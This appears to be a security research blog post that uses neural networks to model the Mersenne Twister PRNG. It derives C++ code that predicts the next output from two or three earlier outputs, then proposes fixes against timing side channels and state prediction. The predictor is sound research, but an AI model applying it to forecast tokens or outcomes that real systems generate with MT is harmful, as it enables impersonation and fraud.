 int[0..n-1] MT
 int index := n+1
 const int lower_mask = (1 << r) - 1 // That is, the binary number of r 1's
 const int upper_mask = lowest w bits of (not lower_mask)
 
 // Initialize the generator from a seed
 function seed_mt(int seed) {
     index := n
     MT[0] := seed
     for i from 1 to (n - 1) { // loop over each element
         MT[i] := lowest w bits of (f * (MT[i-1] xor (MT[i-1] >> (w-2))) + i)
     }
 }
 
 // Extract a tempered value based on MT[index]
 // calling twist() every n numbers
 function extract_number() {
     if index >= n {
         if index > n {
           error "Generator was never seeded"
            // Alternatively, seed with constant value; 5489 is used in the reference C code
         }
         twist()
     }
 
     int y := MT[index]
     y := y xor ((y >> u) and d)
     y := y xor ((y << s) and b)
     y := y xor ((y << t) and c)
     y := y xor (y >> l)
 
     index := index + 1
     return lowest w bits of (y)
 }
 
 // Generate the next n values from the series x_i 
 function twist() {
     for i from 0 to (n-1) {
         int x := (MT[i] and upper_mask)
                   + (MT[(i+1) mod n] and lower_mask)
         int xA := x >> 1
         if (x mod 2) != 0 { // lowest bit of x is 1
             xA := xA xor a
         }
         MT[i] := MT[(i + m) mod n] xor xA
     }
     index := 0
 } 

The first function, seed_mt, initializes the 624 state values using the initial seed and a linear XOR function. This function is straightforward, and we will not go into the details of its implementation as it is irrelevant to our goal. The two main functions we have are extract_number and twist. extract_number is called every time we want to generate a new random value. It starts by checking whether the state is initialized; if not, it either initializes it by calling seed_mt with a constant seed or returns an error. Its first step is then to call the twist function to twist the internal state, as we will describe later. This twist is called again every 624 calls to extract_number. After that, the code uses the number at the current index (which starts at 0 and goes up to 623) to temper one word from the state at that index using some linear XOR, SHIFT, and AND operations. At the end of the function, we increment the index and return the tempered state value.

The twist function changes the internal state to a new state at the beginning and after every 624 numbers generated. As we can see from the code, the function uses the values at indices i, i+1, and i+m to generate the new value at index i using XOR, SHIFT, and AND operations similar to the tempering function above.

Please note that w, n, m, r, a, u, d, s, b, t, c, l, and f are predefined constants for the algorithm that may change from one version to another. The values of these constants for MT19937 are as follows:

  • (w, n, m, r) = (32, 624, 397, 31)
  • a = 0x9908B0DF
  • (u, d) = (11, 0xFFFFFFFF)
  • (s, b) = (7, 0x9D2C5680)
  • (t, c) = (15, 0xEFC60000)
  • l = 18
  • f = 1812433253
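
To make the algorithm concrete, here is a compact Python sketch of the pseudocode above with the MT19937 constants plugged in. It is meant for experimentation; the reference C implementation differs in details such as default seeding.

class MT19937:
    def __init__(self, seed):
        # seed_mt: linear initialization of the 624-word state
        self.MT = [0] * 624
        self.index = 624
        self.MT[0] = seed
        for i in range(1, 624):
            self.MT[i] = (1812433253 * (self.MT[i - 1] ^ (self.MT[i - 1] >> 30)) + i) & 0xFFFFFFFF

    def twist(self):
        # Regenerate all 624 state words in place
        for i in range(624):
            x = (self.MT[i] & 0x80000000) | (self.MT[(i + 1) % 624] & 0x7FFFFFFF)
            xA = x >> 1
            if x & 1:
                xA ^= 0x9908B0DF          # the constant a
            self.MT[i] = self.MT[(i + 397) % 624] ^ xA
        self.index = 0

    def extract_number(self):
        # Temper one state word into an output value
        if self.index >= 624:
            self.twist()
        y = self.MT[self.index]
        y ^= (y >> 11) & 0xFFFFFFFF       # (u, d)
        y ^= (y << 7) & 0x9D2C5680        # (s, b)
        y ^= (y << 15) & 0xEFC60000       # (t, c)
        y ^= y >> 18                      # l
        self.index += 1
        return y & 0xFFFFFFFF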

3. Using Neural Networks to model the MT19937 PRNG

As we saw in the previous section, MT can be split into two main steps: twisting and tempering. The twisting step only happens once every n calls to the PRNG (where n equals 624 in MT19937) to twist the old state into a new one. The tempering step happens with each number generated, converting one of the 624 states into a random number. Hence, we plan to use two NN models to learn each step separately. We will then use the two models to reverse the whole PRNG: the reverse-tempering model takes us from a generated number back to its internal state, and the twisting model produces the new state. Finally, we can temper the generated state to get the expected new PRNG number.

3.1 Using NN for State Twisting

Looking at the twisting function, the last assignment (MT[i] := MT[(i + m) mod n] xor xA) shows that the new state at position i depends on the variable xA and the value of the old state at position (i + m), where m equals 397 in MT19937. The value of xA in turn depends on the variable x and the constant a, and the value of x depends on the old state’s values at positions i and i + 1.

Hence, without getting into the details, we can deduce that each new twisted state depends on three old states as follows:

MT[i] = f(MT[i - 624], MT[i - 624 + 1], MT[i - 624 + m])

    = f(MT[i - 624], MT[i - 623], MT[i - 227])     ( using m = 397 as in MT19937 )

We want to train an NN model to learn the function f, hence effectively replicating the twisting step. To accomplish this, we created a modified generator that outputs the internal state (without tempering) instead of the random number. This allows us to correlate the internal states with each other, as described in the above formula.

3.1.1 Data Preparation

We have generated a sequence of 5,000,000 32-bit state words. We then formatted these states into three 32-bit inputs and one 32-bit output, creating a dataset of around five million records (5 million - 624). Then we split the data into training and testing sets, with only 100,000 records for the test set; the rest of the data is used for training.
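
As a sketch of this preparation step, reusing the MT19937 class above (the seed and sample count here are illustrative; the post used 5,000,000 states):

import numpy as np

def to_bits(v, width=32):
    # LSB-first bit vector of a 32-bit word
    return [(v >> k) & 1 for k in range(width)]

rng = MT19937(seed=42)
states = []
for _ in range(2000):        # ~1.25M raw states; scale up as needed
    rng.twist()
    states.extend(rng.MT)    # collect raw (untempered) internal states

# Pair each new state with the three old states it depends on
X = np.array([to_bits(states[i - 624]) + to_bits(states[i - 623]) + to_bits(states[i - 227])
              for i in range(624, len(states))], dtype=np.uint8)
y = np.array([to_bits(states[i]) for i in range(624, len(states))], dtype=np.uint8)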

3.1.2 Neural Network Model Design

Our proposed model has 96 inputs in the input layer, representing the three old states at the specific locations described in the previous equation (32 bits each), and 32 outputs in the output layer, representing the new 32-bit state. The main hyperparameters we need to decide are the number of neurons/nodes and hidden layers. We tested different model structures with different numbers of hidden layers and neurons in each layer. We then used Keras’ BayesianOptimization tuner to select the optimal number of hidden layers/neurons along with other optimization parameters (such as the learning rate), using a small subset of the training set for this search. We got multiple promising model structures and chose the smallest one with the most promising result.

3.1.3 Optimizing the NN Inputs

After training multiple models, we noticed that the weights connecting the first 31 of the 96 input bits to the first hidden layer’s nodes are almost always close to zero. This implies that those bits have no effect on the output bits, and hence we can ignore them in our training. Checking this observation against the MT implementation, we see that the state at position i is bitwise ANDed with a bitmask called upper_mask, which has a value of 1 in the MSB and 0 for the rest when r is 31, as in MT19937. So, we only need the MSB of the state at position i, and we can train our NN with only 65 input bits instead of 96.

Hence, our neural network ended up with the following structure (the input layer is not shown):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 96)                6336      
_________________________________________________________________
dense_1 (Dense)              (None, 32)                3104      
=================================================================
Total params: 9,440
Trainable params: 9,440
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is only 6,336 (65×96 weights + 96 biases), and the number of parameters of the output layer is 3,104 (96×32 weights + 32 biases), for a total of 9,440 parameters to train. The hidden layer activation function is relu, while the output layer activation function is sigmoid, as we expect a binary output. Here is the summary of the model parameters:

Twisting Model
  Model Type:            Dense Network
  #Layers:               2
  #Neurons:              128 (Dense)
  #Trainable Parameters: 9,440
  Activation Functions:  Hidden Layer: relu; Output Layer: sigmoid
  Loss Function:         binary_crossentropy
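
A Keras sketch matching this summary might look as follows, where X and y come from the dataset sketch earlier and the 65 retained bits are the first state’s MSB plus all bits of the other two states. The optimizer settings are assumptions; the post tuned them with BayesianOptimization.

import tensorflow as tf

# Keep only the 65 useful input bits: the first state's MSB (column 31)
# plus all 64 bits of the other two states.
X65 = np.concatenate([X[:, 31:32], X[:, 32:]], axis=1)

model = tf.keras.Sequential([
    tf.keras.layers.Input(shape=(65,)),
    tf.keras.layers.Dense(96, activation="relu"),     # hidden layer: 6,336 params
    tf.keras.layers.Dense(32, activation="sigmoid"),  # output layer: 3,104 params
])
model.compile(optimizer="adam", loss="binary_crossentropy",
              metrics=["binary_accuracy"])
# model.fit(X65[:-100_000], y[:-100_000],
#           validation_data=(X65[-100_000:], y[-100_000:]))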

3.1.4 Model Results

After a few hours and some manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy on both the training and testing sets. To be more confident in this result, we generated a new sample of 1,000,000 states using a different seed than the one used to generate the previous data. We got the same 100% bitwise accuracy when we tested with the newly generated data.

This means that the model has learned the exact formula relating each state to the three previous states. Hence, if we had access to the three internal states at those specific locations, we could predict the next state. But usually we only have access to the old random numbers, not the internal states. So we need a different model that can reverse a generated, tempered number into its equivalent internal state. We can then use this model to create the new state and apply the normal tempering step to get the new output. But before we get to that, let’s do a model deep dive.

3.1.5 Model Deep Dive

This section dives deeper into the model to understand what it has learned from the state-relations data and whether it matches our expectations.

3.1.5.1 Model First Layer Connections

As discussed in Section 2, each state depends on three previous states, and we also showed that we only need the MSB (most significant bit) of the first state; hence we had 65 bits as input. Now we would like to examine whether all 65 input bits have the same effect on the 32 output bits. In other words, do all the input bits have more or less the same importance for the outputs? We can use the NN weights that connect the 65 inputs to the 96 hidden nodes of our trained model to determine the importance of each bit. The following figure shows the weights connecting each input, on the x-axis, to the 96 hidden nodes in the hidden layer:

We can see that the second input bit, which corresponds to the LSB of the second state, is connected to many hidden layer nodes, implying that it affects multiple bits in the output. Comparing this observation against the code listed in Section 2, it corresponds to the if-condition that checks that LSB; based on its value, the new state may be XORed with a constant value that dramatically affects it.

We can also notice that the 33rd input, marked on the figure, is almost not connected to any hidden layer nodes, as all its weights are close to zero. This maps to the masking of the second state with lower_mask (0x7FFFFFFF in MT19937) in the twist function, which neglects that state’s MSB altogether.

3.1.5.2 The Logic Closed-Form from the State Twisting Model Output

After creating a model that can replicate the twist operation of the states, we would like to see if we can get to the logic closed form using the trained model. Of course, we could derive the closed form by enumerating all 65-bit input variations and testing each combination’s outputs (2^65 of them), but this approach is tedious and requires too many evaluations. Instead, we can test the effect of each input on each output separately. This can be done by taking the training set and holding each input bit individually, one time at 0 and one time at 1, and seeing which bits in the output are affected. This shows which input bits affect each output bit. For example, when we checked the first input, which corresponds to the MSB of the first state, we found it only affects bit 30 in the output. The following table shows the effect of each input bit on each output bit:

Input Bits Output Bits
0   [30]
1   [0, 1, 2, 3, 4, 6, 7, 12, 13, 15, 19, 24, 27, 28, 31]
2   [0]
3   [1]
4   [2]
5   [3]
6   [4]
7   [5]
8   [6]
9   [7]
10   [8]
11   [9]
12   [10]
13   [11]
14   [12]
15   [13]
16   [14]
17   [15]
18   [16]
19   [17]
20   [18]
21   [19]
22   [20]
23   [21]
24   [22]
25   [23]
26   [24]
27   [25]
28   [26]
29   [27]
30   [28]
31   [29]
32   []
33   [0]
34   [1]
35   [2]
36   [3]
37   [4]
38   [5]
39   [6]
40   [7]
41   [8]
42   [9]
43   [10]
44   [11]
45   [12]
46   [13]
47   [14]
48   [15]
49   [16]
50   [17]
51   [18]
52   [19]
53   [20]
54   [21]
55   [22]
56   [23]
57   [24]
58   [25]
59   [26]
60   [27]
61   [28]
62   [29]
63   [30]
64   [31]
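
A table like the one above can be produced with a probe along the following lines (a sketch, assuming the trained model and the X65 inputs from the earlier sketches):

def affected_output_bits(model, X, bit, batch=1024):
    # Hold input `bit` at 0 and then at 1 across real samples and record
    # which predicted output bits flip.
    X0, X1 = X[:batch].copy(), X[:batch].copy()
    X0[:, bit], X1[:, bit] = 0, 1
    p0 = model.predict(X0, verbose=0) > 0.5
    p1 = model.predict(X1, verbose=0) > 0.5
    return sorted(np.where((p0 != p1).any(axis=0))[0].tolist())

# e.g. affected_output_bits(model, X65, 0) is expected to return [30]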

We can see that inputs 33 to 64, which correspond to the third state, affect bits 0 to 31 of the output. We can also see that inputs 2 to 31, which correspond to bits 1 to 30 of the second state (ignoring its LSB and MSB), affect bits 0 to 29 of the output. And as we know, the state evaluation uses the XOR logic function. We can formalize the closed form as follows (ignoring bits 0 and 1 of the input for now):

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1)

This formula is close to the final result; we still need to add the effect of input bits 0 and 1. Input 0, which corresponds to the first state’s MSB, affects only bit 30 of the output, i.e., the MSB shifted right by one position. Hence we can update the above closed form to:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1)

Lastly, input 1, which corresponds to the second state’s LSB, affects 15 bits in the output. As it feeds an XOR, if this bit is 0 it does not affect the output, but if it is 1 it flips all 15 listed bits (by XORing them). If we assemble these 15 bits into a hexadecimal value, we get 0x9908B0DF (which corresponds to the constant a in MT19937). We can then include this in the closed form as follows:

          MT[i] = MT[i - 227] ^ ((MT[i - 623] & 0x7FFFFFFF) >> 1) ^ ((MT[i - 624] & 0x80000000) >> 1) ^ ((MT[i - 623] & 1) * 0x9908B0DF)

So, if the LSB of the second state is 0, the AND yields 0 and the multiplication yields 0; but if it is 1, the AND yields 1 and the multiplication yields 0x9908B0DF. This is equivalent to the if-condition in the code listing. We can rewrite the above equation to use the circular state buffer as follows:

          MT[i] = MT[(i + 397) % 624] ^ ((MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1) ^ ((MT[i] & 0x80000000) >> 1) ^ ((MT[(i + 1) % 624] & 1) * 0x9908B0DF)
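
As a quick sanity check, this sketch applies the closed form progressively in place and compares it against the twist of the MT19937 class from earlier:

rng = MT19937(seed=1234)
state = list(rng.MT)     # copy of the state before twisting
rng.twist()              # reference result

for i in range(624):     # apply the closed form progressively, in place
    state[i] = (state[(i + 397) % 624]
                ^ ((state[(i + 1) % 624] & 0x7FFFFFFF) >> 1)
                ^ ((state[i] & 0x80000000) >> 1)
                ^ ((state[(i + 1) % 624] & 1) * 0x9908B0DF))

assert state == rng.MT   # matches the real twist on every entry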

Now let’s check how to reverse the tempered numbers to the internal states using an ML model.

3.2 Using NN for State Tempering

We plan to train a neural network model for this phase to reverse the state tempering, i.e., the series of XOR and SHIFT operations applied to y in the extract_number listing above. So, we updated the code to output the state both before and after tempering; the tempered values serve as inputs and the raw states as outputs for the neural network.

3.2.1 Data Preparation

We have generated a sequence of 5,000,000 32-bit state words and their tempered values. We used the tempered states as inputs and the original states as outputs, creating a dataset of 5 million records. Then we split the data into training and testing sets, with only 100,000 records for the test set; the rest is used for training.
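
A sketch of this preparation, reusing states, to_bits, and np from the earlier sketch; temper mirrors the tempering steps of extract_number with the MT19937 constants:

def temper(y):
    y ^= (y >> 11) & 0xFFFFFFFF
    y ^= (y << 7) & 0x9D2C5680
    y ^= (y << 15) & 0xEFC60000
    y ^= y >> 18
    return y & 0xFFFFFFFF

X_t = np.array([to_bits(temper(v)) for v in states], dtype=np.uint8)  # inputs: tempered values
y_t = np.array([to_bits(v) for v in states], dtype=np.uint8)          # targets: raw states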

3.2.2 Neural Network Model Design

Our proposed model has 32 inputs in the input layer, representing the tempered state values, and 32 outputs in the output layer, representing the original 32-bit state. The main hyperparameters we need to decide are the number of neurons/nodes and hidden layers. We tested different model structures with different numbers of hidden layers and neurons in each layer, similar to the previous NN model, and again used the smallest model structure with the most promising result. Hence, our neural network ended up with the following structure (the input layer is not shown):

_________________________________________________________________
Layer (type)                 Output Shape              Param #   
=================================================================
dense (Dense)                (None, 640)               21120     
_________________________________________________________________
dense_1 (Dense)              (None, 32)                20512     
=================================================================
Total params: 41,632
Trainable params: 41,632
Non-trainable params: 0
_________________________________________________________________

As we can see, the number of parameters (weights and biases) of the hidden layer is 21,120 (32×640 weights + 640 biases), and the number of parameters of the output layer is 20,512 (640×32 weights + 32 biases), for a total of 41,632 parameters to train. This model is much bigger than the twisting model, as the operations done in tempering are much more complex than those done in twisting. Similarly, the hidden layer activation function is relu, while the output layer activation function is sigmoid, as we expect a binary output. Here is the summary of the model parameters:

Tempering Model
  Model Type:            Dense Network
  #Layers:               2
  #Neurons:              672 (Dense)
  #Trainable Parameters: 41,632
  Activation Functions:  Hidden Layer: relu; Output Layer: sigmoid
  Loss Function:         binary_crossentropy
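
The corresponding Keras sketch, under the same assumptions as the twisting model sketch above:

inverse_temper = tf.keras.Sequential([
    tf.keras.layers.Input(shape=(32,)),
    tf.keras.layers.Dense(640, activation="relu"),    # hidden layer: 21,120 params
    tf.keras.layers.Dense(32, activation="sigmoid"),  # output layer: 20,512 params
])
inverse_temper.compile(optimizer="adam", loss="binary_crossentropy",
                       metrics=["binary_accuracy"])
# inverse_temper.fit(X_t[:-100_000], y_t[:-100_000],
#                    validation_data=(X_t[-100_000:], y_t[-100_000:]))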

3.2.3 Model Results

After manual tweaking of the model architecture, we trained a model that achieved 100% bitwise accuracy on both the training and testing sets. To be more confident in this result, we generated a new sample of 1,000,000 states and tempered states using a different seed than those used previously, and again got 100% bitwise accuracy on the newly generated data.

This means the model has learned the exact inverse formula relating each tempered state to its original state. Hence, we can use this model to reverse the generated numbers into the internal states we need for the first model, use the twisting model to get the new state, and then apply the normal tempering step to get the new output. But before we get to that, let’s do a model deep dive.

3.2.4 Model Deep Dive

This section dives deeper into the model to understand what it has learned from the state-relations data and whether it matches our expectations.

3.2.4.1 Model Layers Connections

After training the model, we wanted to test whether any bits are unused or less connected. The following figure shows the weights connecting each input, on the x-axis, to the 640 hidden nodes in the hidden layer (each point represents one hidden-node weight):

As we can see, each input bit is connected to many hidden nodes, which implies that each input bit carries more or less the same weight as the others. We also plot, in the following figure, the connections between the hidden layer and the output layer:

The same observation holds here, except that bits 29 and 30 are perhaps less connected than the others, though they are still well connected to many hidden nodes.

3.2.4.2 The Logic Closed-Form from the State Tempering Model Output

In the same way as with the first model, we can derive a closed-form logic expression that reverses the tempering using the model output. But instead of doing so, we can derive a closed-form logic expression that takes the generated numbers at the positions mentioned in the first part, reverses them to internal states, generates the new state, and produces the new number in one step. So, we plan to connect three instances of the reverse-tempering model to one twisting model that generates the new state, and then temper the output to get the newly generated number, as shown in the following figure:

Now we have 3 x 32 input bits and 32 output bits. Using the same approach described before, we can test the effect of each input on each output separately. This shows how each input bit affects each output bit. The following table shows the input-output relations:

Input Index Input Bits Output Bits
0 0   []
0 1   []
0 2   [1, 8, 12, 19, 26, 30]
0 3   []
0 4   []
0 5   []
0 6   []
0 7   []
0 8   []
0 9   [1, 8, 12, 19, 26, 30]
0 10   []
0 11   []
0 12   []
0 13   []
0 14   []
0 15   []
0 16   [1, 8, 12, 19, 26, 30]
0 17   [1, 8, 12, 19, 26, 30]
0 18   []
0 19   []
0 20   [1, 8, 12, 19, 26, 30]
0 21   []
0 22   []
0 23   []
0 24   [1, 8, 12, 19, 26, 30]
0 25   []
0 26   []
0 27   [1, 8, 12, 19, 26, 30]
0 28   []
0 29   []
0 30   []
0 31   [1, 8, 12, 19, 26, 30]
1 0   [3, 5, 7, 9, 11, 14, 15, 16, 17, 18, 23, 25, 26, 27, 28, 29, 30, 31]
1 1   [0, 4, 7, 22]
1 2   [13, 16, 19, 26, 31]
1 3   [2, 6, 24]
1 4   [0, 3, 7, 10, 18, 25]
1 5   [4, 7, 8, 11, 25, 26]
1 6   [5, 9, 12, 27]
1 7   [5, 7, 9, 10, 11, 14, 15, 16, 17, 18, 21, 23, 25, 26, 27, 29, 30, 31]
1 8   [7, 11, 14, 29]
1 9   [1, 19, 26]
1 10   [9, 13, 31]
1 11   [2, 3, 5, 7, 9, 10, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 12   [7, 11, 25]
1 13   [1, 9, 12, 19, 27]
1 14   [2, 10, 13, 20, 28]
1 15   [3, 14, 21]
1 16   [1, 8, 12, 15, 19, 26, 30]
1 17   [1, 5, 8, 13, 16, 19, 23, 26, 31]
1 18   [3, 5, 6, 7, 9, 11, 14, 15, 16, 18, 23, 24, 25, 26, 27, 28, 29, 30, 31]
1 19   [4, 18, 22, 25]
1 20   [1, 13, 16, 26, 31]
1 21   [6, 20, 24]
1 22   [0, 2, 3, 5, 6, 9, 11, 13, 14, 15, 16, 17, 20, 21, 23, 26, 27, 29, 30, 31]
1 23   [7, 8, 11, 22, 25, 26]
1 24   [1, 8, 9, 12, 19, 23, 26, 27]
1 25   [5, 6, 7, 9, 10, 11, 13, 14, 15, 16, 17, 18, 21, 23, 24, 25, 26, 27, 29, 30]
1 26   [11, 14, 25, 29]
1 27   [1, 8, 19]
1 28   [13, 27, 31]
1 29   [2, 3, 5, 7, 9, 11, 13, 14, 15, 16, 18, 20, 23, 24, 25, 26, 27, 29, 30, 31]
1 30   [7, 25, 29]
1 31   [8, 9, 12, 26, 27]
2 0   [0]
2 1   [1]
2 2   [2]
2 3   [3]
2 4   [4]
2 5   [5]
2 6   [6]
2 7   [7]
2 8   [8]
2 9   [9]
2 10   [10]
2 11   [11]
2 12   [12]
2 13   [13]
2 14   [14]
2 15   [15]
2 16   [16]
2 17   [17]
2 18   [18]
2 19   [19]
2 20   [20]
2 21   [21]
2 22   [22]
2 23   [23]
2 24   [24]
2 25   [25]
2 26   [26]
2 27   [27]
2 28   [28]
2 29   [29]
2 30   [30]
2 31   [31]

As we can see, each bit in the third input affects the same bit of the output, in order. Also, only 8 bits of the first input matter, and they all affect the same 6 output bits. But for the second input, each bit affects several output bits. Although we could write a closed-form logic expression for this, we will write code instead.

The following code implements a C++ function that can use three generated numbers (at specific locations) to generate the next number:

#include <cstdint>

typedef uint32_t uint; // the listing assumes a 32-bit unsigned "uint" type

// XOR masks learned by the model: entry i holds the output bits flipped
// when bit i of MT_623 is set.
uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

uint gen_new_number(uint MT_624, uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    // XOR together the output masks of every set bit in MT_623
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    // Only 8 bits of MT_624 matter; fold them into a single parity bit
    MT_624 &= 0x89130204;
    MT_624 ^= MT_624 >> 16;
    MT_624 ^= MT_624 >> 8;
    MT_624 ^= MT_624 >> 4;
    MT_624 ^= MT_624 >> 2;
    MT_624 ^= MT_624 >> 1;
    r ^= (MT_624 & 1) * 0x44081102;
    
    // The third number contributes its bits unchanged
    r ^= MT_227;
    return r;
}

We tested this code by using the standard MT library in C to generate a sequence of random numbers and matching the function’s output against the next number generated by the library. The outputs matched 100% over several million generated numbers with different seeds.

3.2.4.3 Further Improvement

We saw in the previous section that we can use three generated numbers to produce the next number in the sequence. But we noticed that we only need 8 bits from the first number, which are XORed together, and if their XOR is one, the result is XORed with the constant 0x44081102. Based on this observation, we can ignore the first number altogether and generate the two possible output values, with and without the XOR by 0x44081102. Here is the code segment for the new function:

#include <cstdint>
#include <tuple>

using namespace std;

typedef uint32_t uint; // as in the previous listing

uint inp_out_xor_bitsY[32] = {
    0xfe87caa8,
    0x400091,
    0x84092000,
    0x1000044,
    0x2040489,
    0x6000990,
    0x8001220,
    0xeea7cea0,
    0x20004880,
    0x4080002,
    0x80002200,
    0xff95eeac,
    0x2000880,
    0x8081202,
    0x10102404,
    0x204008,
    0x44089102,
    0x84892122,
    0xff85cae8,
    0x2440010,
    0x84012002,
    0x1100040,
    0xecb3ea6d,
    0x6400980,
    0xc881302,
    0x6fa7eee0,
    0x22004800,
    0x80102,
    0x88002000,
    0xef95eaac,
    0x22000080,
    0xc001300
};

// Without MT_624 we cannot resolve the parity bit, so return both candidates:
// the result as-is and the result XORed with the constant 0x44081102.
tuple <uint, uint> gen_new_number(uint MT_623, uint MT_227) {
    uint r = 0;
    uint i = 0;
    do {
        r ^= (MT_623 & 1) * inp_out_xor_bitsY[i++];
    }
    while (MT_623 >>= 1);
    
    r ^= MT_227;
    return make_tuple(r, r ^ 0x44081102);
}

4. Improving MT algorithm

We have shown in the previous sections how to use ML to crack the MT algorithm, using only two or three numbers to predict the next number in the sequence. In this section, we discuss two issues with the MT algorithm and how to improve on them. Studying these issues can be particularly useful when MT is used as part of a cryptographically-secure PRNG, as in CryptMT. CryptMT uses the Mersenne Twister internally and was developed by Matsumoto, Nishimura, Mariko Hagita, and Mutsuo Saito [2].

4.1 Normalizing the Runtime

As we described in Section 2, MT consists of two steps: twisting and tempering. Although the tempering step is applied on every call, the twisting step only runs when we exhaust all the states and need to twist the state array into a new internal state. That is fine algorithmically, but from the cybersecurity point of view it is problematic: it makes the algorithm vulnerable to a timing side-channel attack. In this attack, the attacker can determine when the state is being twisted by monitoring the runtime of each generated number; when it is much longer, the start of a new state can be guessed. The following figure shows an example of the runtime for the first 10,000 generated numbers using MT:

We can clearly see that every 624 iterations, the runtime of the MT algorithm increases significantly due to the state-twisting evaluation. Hence, the attacker can easily determine the start of the state twisting by setting a threshold of around 0.4 ms on the per-number runtime. Fortunately, this issue can be resolved by updating the internal state every time we generate a new number, using the progressive formula we created earlier. Using this approach, we updated the code for MT and measured the runtime again; here is the result:

We can see that the runtime of the algorithm is now normalized across all iterations. Of course, we checked the output of both MT implementations, and they produce the exact same sequences. Also, when we evaluated the mean runtime of both implementations over millions of generated numbers, the new approach is slightly more efficient and has a much smaller standard deviation.
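
A sketch of this normalized variant, reusing the MT19937 class from earlier: each call refreshes exactly one state word with the progressive closed form before tempering it, so every call does a constant amount of work. With the same seed it produces the same output sequence as the class above.

class MT19937Progressive(MT19937):
    def extract_number(self):
        i = self.index % 624
        # Refresh exactly one state word per call using the progressive form
        self.MT[i] = (self.MT[(i + 397) % 624]
                      ^ ((self.MT[(i + 1) % 624] & 0x7FFFFFFF) >> 1)
                      ^ ((self.MT[i] & 0x80000000) >> 1)
                      ^ ((self.MT[(i + 1) % 624] & 1) * 0x9908B0DF))
        y = self.MT[i]
        y ^= (y >> 11) & 0xFFFFFFFF
        y ^= (y << 7) & 0x9D2C5680
        y ^= (y << 15) & 0xEFC60000
        y ^= y >> 18
        self.index += 1
        return y & 0xFFFFFFFF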

4.2 Changing the Internal State as a Whole

We showed in the previous section that the MT twist step is equivalent to changing the internal state progressively. This is the main reason we were able to build a machine learning model that can correlate a generated output from MT with three previous outputs. In this section, we suggest changing the algorithm slightly to overcome this weakness. The idea is to apply the twisting step to the old state all at once and generate the new state from it. This can be achieved by performing the twist step into a new state array and swapping the new state with the old one after twisting all the states (see the sketch below). This makes state prediction more complex, as different states will use different distances when evaluating the new state: the new states 0 to 226 use the old states 397 to 623, which are 397 apart, while the new states 227 to 623 use the old states 0 to 396, which are 227 apart. This slight change produces a PRNG more resilient to the attack suggested above, as any generated output can be either 227 or 397 positions away from the outputs it depends on, and we don't know the position of the generated number (whether it is in the first 227 numbers of the state or the last 397). Although this generates a different sequence, predicting the new state from the old ones will be harder. Of course, this suggestion needs deeper review to check the other properties of the resulting PRNG, such as periodicity.
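
A sketch of the suggested change: twist into a fresh buffer so every new entry derives only from old-state entries, then swap. As noted above, this produces a different output sequence than standard MT19937.

def twist_swapped(rng):
    old = rng.MT
    new = [0] * 624
    for i in range(624):  # every read comes from the old buffer
        x = (old[i] & 0x80000000) | (old[(i + 1) % 624] & 0x7FFFFFFF)
        xA = x >> 1
        if x & 1:
            xA ^= 0x9908B0DF
        new[i] = old[(i + 397) % 624] ^ xA
    rng.MT = new          # swap the whole state at once
    rng.index = 0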

5. Conclusion

In this series of posts, we have shared the methodology for cracking two well-known (non-cryptographic) pseudo-random number generators, namely xorshift128 and the Mersenne Twister. In the first post, we showed how a simple machine learning model can learn the internal pattern in the sequence of generated numbers. In this post, we extended that work to a more complex PRNG by splitting the problem into two simpler ones and training a separate NN model for each. We then used the two models together to predict the next number in the sequence from three generated numbers. We also showed how to dive into the models, understand how they work internally, and use them to create closed-form code that breaks the Mersenne Twister (MT) PRNG. Finally, we shared two possible techniques to improve the MT algorithm security-wise, as a means of thinking through algorithmic improvements based on patterns identified by deep learning (while recognizing that these changes do not themselves make MT suitable for use where cryptographic randomness is required).

The Python code for training and testing the models outlined in this post is shared in this repo in the form of a Jupyter notebook. Please note that this code builds on top of an older version of the code shared in [3] and the changes made in Part 1 of this series.

Acknowledgment

I would like to thank my colleagues at NCC Group for their help and support and for giving valuable feedback, especially on the crypto/cybersecurity parts. Here are a few names I would like to thank explicitly: Ollie Whitehouse, Jennifer Fernick, Chris Anley, Thomas Pornin, Eric Schorn, and Eli Sohl.

References

[1] Mike Shema, Chapter 7 – Leveraging Platform Weaknesses, Hacking Web Apps, Syngress, 2012, Pages 209-238, ISBN 9781597499514, https://doi.org/10.1016/B978-1-59-749951-4.00007-2.

[2] Matsumoto, Makoto; Nishimura, Takuji; Hagita, Mariko; Saito, Mutsuo (2005). “Cryptographic Mersenne Twister and Fubuki Stream/Block Cipher” (PDF).

[3] Everyone Talks About Insecure Randomness, But Nobody Does Anything About It
